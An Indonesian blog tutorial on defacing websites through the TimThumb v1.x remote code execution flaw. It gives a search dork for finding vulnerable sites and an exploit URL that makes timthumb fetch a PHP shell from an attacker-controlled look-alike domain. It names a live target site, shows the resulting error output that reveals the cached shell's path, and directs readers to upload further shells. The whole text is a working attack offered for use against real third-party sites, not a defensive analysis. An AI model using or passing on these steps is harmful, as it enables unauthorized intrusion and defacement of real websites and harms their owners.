Hello ^^ kali ini saya akan share Cara deface dengan Exploit Timthumb V1.XX RCE
yuk langsung saja ke tutorialnya,
Dork : inurl:/timthumb.php
atau bisa kalian pake dengan List Dork Timthumb V1.XX RCE disini
Exploit : timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
Disini saya punya live targetnya => http://cityfordhcm.com/timthumb.php
Untuk ciri ciri web vuln rce timthumb seperti gambar dibawah ini .
jika sudah menemukan website yang seperti itu kita langsung saja exploit seperti ini
http://cityfordhcm.com/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
nanti akan keluar seperti gambar dibawah ini atau seperti ini
Unable to open image : /home/cityfordhcm/public_html/cache/external_66b043a706b2265ea1b66330089ac2a0.php
Query String : src=http://flickr.com.tukangpompajakarta.com/shell.php
TimThumb version : 1.30
Untuk akses shell di timthumb bisa di liat di unable to open image berati di http://cityfordhcm.com/cache/external_66b043a706b2265ea1b66330089ac2a0.php
Setelah itu kalian buka http://cityfordhcm.com/cache/dedot.php untuk upload shell :D
Mungkin sekian dulu dari saya mengenai artikel Cara deface dengan Exploit Timthumb V1.XX RCE semoga bermanfaat..
EmoticonEmoticon